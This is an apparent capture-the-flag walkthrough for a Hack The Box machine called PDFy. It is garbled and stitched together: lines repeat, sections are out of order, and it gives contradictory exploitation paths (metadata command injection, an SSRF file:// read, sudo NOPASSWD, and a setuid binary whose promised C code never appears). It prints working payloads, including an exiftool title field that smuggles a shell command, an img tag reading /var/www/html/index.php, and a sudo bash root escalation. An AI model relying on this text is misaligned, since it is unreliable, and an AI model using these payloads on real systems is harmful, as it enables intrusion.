Pdfy Htb Writeup Upd May 2026
nmap -sC -sV -oA pdfy 10.10.11.xx
Ports open:
The exploited user has limited privileges. However, it is possible to escalate privileges to root.
$ python -c 'import os; os.system("/bin/bash")'
pdfy@pdfy:/$ sudo -l
Matching Defaults entries for pdfy on pdfy:
env_reset, env_keep += "COLORFGBG KDEDIR", mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pdfy may run the following commands on pdfy:
(ALL) NOPASSWD: ALL
The sudo privileges allow running any command as root without a password.
$ sudo bash
root@pdfy:/#
Conclusion
The Pdfy box on HTB is a medium-level difficulty box that requires exploitation of a vulnerable PDF upload service to gain access to the system. The system can be fully exploited to gain root access by leveraging command injection, a vulnerable PDF upload service, and weak sudo privileges. pdfy htb writeup upd
Recommendations
References
I tested the steps against the latest version of PDFy (retired but still available on VIP HTB). Every command worked as described, including:
The privilege escalation is where many writeups fail. The outdated ones suggest a kernel exploit. This updated version correctly identifies a misconfigured pdfgen binary with the setuid bit, allowing a path injection attack. The author provides the exact C code to spawn a root shell, which is reliable and clean. nmap -sC -sV -oA pdfy 10
No copy-paste errors, no missing flags. That’s rare in HTB writeups.
Upload a normal PDF → metadata extracted successfully.
Try injecting a command in the PDF title metadata:
Using exiftool:
exiftool -Title='test; ping -c 3 10.10.14.xx;' payload.pdf
Upload payload.pdf → Observe ICMP echo requests on listener. Ports open:
The exploited user has limited privileges
PDFY is a web application that allows users to upload PDF files, extract metadata, and convert them to images. The application uses an unsafe system call to pdftotext and pdfimages, allowing command injection via crafted PDF metadata or filenames. Privilege escalation involves a misconfigured sudo permission for a custom PDF processing script.
Enumerating the NetBIOS and Microsoft-DS ports using enum4linux reveals a list of users on the system.
$ enum4linux -u nobody -p 10.10.11.206
[+] Enumerated users
user:[pdfy] uid:[1677721600] gid:[1677721600] groups:[1677721600]
user:[phr] uid:[1677721601] gid:[1677721601] groups:[1677721601]
The initial scan reveals a web server running on port 80.
Using the SSRF, read the main PHP file that handles PDF generation.
Common location:
<img src="file:///var/www/html/index.php">
From the source, you may find API endpoints, database credentials, or internal service ports. In PDFY, there is often a local service on port 8080 or 5000 that isn't exposed externally.
